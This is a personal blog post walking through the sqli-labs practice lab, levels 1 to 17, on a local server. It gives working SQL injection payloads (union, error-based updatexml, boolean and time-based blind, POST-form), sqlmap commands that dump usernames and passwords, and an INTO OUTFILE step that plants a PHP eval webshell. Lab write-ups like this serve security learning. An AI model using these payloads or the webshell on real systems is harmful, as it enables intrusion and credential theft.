Mamor's Blog
0%

sqli-labs1

发表于 更新于 分类于
本文字数: 17k 阅读时长 ≈ 15 分钟

union select 1,2,table_name from information_schema.tables where table_schema = database() limit 0,1查字段

union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='表名' limit 0,1

1.

1
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

'闭合

id = 1' --+

id =1' order by 4 --+ #报错 说明有三个字段

id = 1.9999' and union select 1,2,3 --+ 2,3是输出点

id=1.9999' and union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 --+查表名

id=-1' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1--+ 查字段

?id=-1' union select 1,username,password from users limit 1,1--+ 查账号密码

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dbs --batch --tables

加了--batch sqlmap不会询问你输入 全部默认确定

2.

1
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


id=1 and 1=1 union select 1,2, table_name from information_schema.tables where table_schema=database() limit 1,1 --+ 查表名

id=1 and 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1--+ 查字段


SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" --dbs --batch --tables



3.

1
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

')闭合

id=1') and 1=1 --+

id=1.999') and 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1 --+

id=1.999') and 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1 --+

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" --dbs --batch


4.

1
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

")闭合

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-4/?id=1" --dbs --batch


5.报错注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

id=1' --+页面正常 说明用 '闭合

id=1' and 1=1 --+ 有回显

id=1' and 1=2 --+无回显

查看代码,发现只要语句执行成功就会返回'You are in ........'

可以考虑使用报错注入或者布尔盲注

报错注入使用updatexml

id=1' and updatexml(1,concat(0x7e,(select concat_ws(':',database(),version(),user()))),1)--+==> XPATH syntax error: '~security:5.7.26:root@localhost'得到数据库等信息

id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1)--+得到表名==> XPATH syntax error: '~emails,referers,uagents,users~'

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+得到字段名==>XPATH syntax error: '~id,username,password~'

id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+查账号密码


SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" #判断是否存在注入

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" --dbs #获取数据库信息

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security --tables #获取表名

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security -T users --columns#获取字段名

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security -T users -C username,password --dump #获取账号密码



6.报错注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3"  color= "#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

使用"闭合

显错注入

id=1" --+

id=1" and 1=1 --+

id=1" and 1=2 --+

id=1" and updatexml(1,(concat(0x7e,(select database()),0x7e)),1) --+ 查数据库名 ==>XPATH syntax error: '~security~'

id=1" and updatexml(1,(concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)),1) --+ 查表名

id=1" and updatexml(1,(concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e)),1) --+ 查字段


7.文件写入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

根据提示要我们写入文件

写入一句话的条件

有数据库的写入权限

知道网站的绝对路径


在做写入练习时,需要用到into outfile ,但执行后却无法生成写入文件

解决方案

在MYSQL命令行输入 show variables like '%secure%';查看secure-file-priv的值

发现secure_file_priv值为NULL

在my.ini中修改或添加secure_file_priv="/"然后报存并重启数据库

运行http://127.0.0.1/sqli-labs/Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%22D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\shell.txt%22%20--+成功生产写入文件


根据代码进行闭合id=1')) --+

id=1')) and (select count(*) from mysql.user)>0--+ 不报错说明是root权限

通过前面的关卡得到决定路径

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+==>

1
2
Your Login name:D:\phpstudy_pro\Extensions\MySQL5.7.26\
Your Password:D:\phpstudy_pro\Extensions\MySQL5.7.26\data\


?id=-1')) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile "D:\phpstudy_pro\WWW\sqli-labs"--+

?id=-1')) union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\shell.php"--+

使用菜刀连接


8.布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

与第五关相比,把部分代码进行了注释,无法使用报错注入,可以考虑布尔盲注或者时间盲注.

?id=1' and 1=1 --+ 有回显 ’you are in’

?id=1' and 1=2 --+无回显

可以判断是布尔盲注

  • 判断Mysql数据库是否是在5.0以上

?id=1' and mid(version(),1,1)=5 --+有回显 或

?id=1' and left(version(),1)='5' --+有回显

?id=1' and left(version(),6)='5.7.26' --+ 有回显判断出数据库版本为5.7.26

  • 判断当前数据库长度

?id=1' and length(database())>7 --+

?id=1' and length(database())=8 --+

  • 截取数据库第一位ascii并判断值

?id=1' and (ord(mid(database(),1,1)))>114 --+

?id=1' and (ord(mid(database(),1,1)))=115 --+

或者

?id=1' and left(database(),1)>'n' --+

?id=1' and left(database(),1)='s' --+

?id=1' and left(database(),2)='se' --+

?id=1' and left(database(),3)='sec' --+

依次得到后面7位 ==>数据库名为security

1
2
3
4
5
6
7
8
9
10
11
12
http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid(database(),1,1)))=
115 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid((select 
database()) ,2,1))) = 101 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid((select 
database()) ,3,1))) = 99 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select 
database()) ,4,1))) = 117 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+


获取数据库第一张表的长度(注:这里length()里面要再加一个括号 )

id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 --+

id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

也可以这样写

?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+ 最终得到长度为6

?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit X,1)>5 --+ 判断第X张表的长度


  • 判断表的第N个字符 截取第N位的ASCII码进行判断,利用ord()mid(***,1,1)或者substr(***,1,1)

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+判断security库中的第一个表的第一个ascii值为101 即e

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+ 第二位位m ==>最终得到第一张表名为emails

第X张表的第N位ASCII码值判断

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit X-1,1),N,1))=101 --+

也可以利用regexp注入获取users表中的列

http://127.0.0.1/sql/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+


使用SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 --dbs --technique B --batch

参数:--technique

这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入) E: Error-based SQL injection(报错型注入) U: UNION query SQL injection(可联合查询注入) S: Stacked queries SQL injection(可多语句查询注入) T: Time-based blind SQL injection(基于时间延迟注入)


9.时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

无论语句是否执行成功,都会返回同样的回显,所以需要通过时间盲注猜解数据

?id=1' and sleep(3) --+尝试'```"等闭合方式,根据sleep确认是否闭合

?id=1' and if(mid(version(),1,1)=5,sleep(5),1) --+判断数据库版本

?id=1' and if(length(database()=8),sleep(5),1) --+判断数据库长度

?id=1' and if(ascii(mid(database(),1,1))=115,sleep(5),1) --+ 判断数据库名

?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>3,sleep(5),1) --+判断表长度(length()里面的需要加())

使用SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-9/?id=1 --dbs --technique T --batch


10.时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

和第九关一样,不过是双引号闭合

?id=1" and sleep(5)--+


11.POST注入

1
2
3
4
5
6
7
8
9
10
11
 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);

if($row)
{
 		//echo '<font color= "#0000ff">';	
 		echo "<br>";
	echo '<font color= "#FFFF00" font size = 4>';
	//echo " You Have successfully logged in\n\n " ;
 ......

uname=admin' and 1=1 -- & passwd=admin或者uname=admin' and 1=1 # & passwd=admin --+会报错

uname=admin' order by 2 -- & passwd=admin判断字段数

uname=-1' and 1=1 union select 1,2 -- & passwd=admin 找回显点

uname=-1' and 1=1 union select @@datadir,version() -- & passwd=admin查看数据库版本


SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

12 POST注入

1
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

") #闭合

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-12/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs


13 POST型布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

没有回显,使用布尔盲注

uname=admin') and left(database(),1)>'n' # & passwd=admin

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-12/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

14POST时间盲注

"闭合 和13题一样


SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-14/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

15 POST时间/布尔盲注

uname=admin' and sleep(5) #& passwd=admin

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs


16POST时间盲注

uname=admin") and sleep(5) #& passwd=admin

SQLmap python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-16/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

python sqlmap.py -r 1.txt --batch --level 3 --dbs

17POST显错注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
		$row1 = $row['username'];  	
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
	
	
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
]			echo "</font>";
		}

只对username使用check_input()函数进行过滤·,check_input()作用是截取15个字符串,如果开启了GPC,就去掉反斜杠,在判断是否是十进制,如果不是十进制, 就转译掉特殊字符

1
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
1
2
3
4
5
6
7
8
9
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
    \x00
    \n
    \r
    \
    '
    "
    \x1a

uname=admin&passwd=123456' #&submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ &submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+ &submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),1) --+ &submit=Submit


SQLmap

python sqlmap.py -r 1.txt --batch --dbs

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------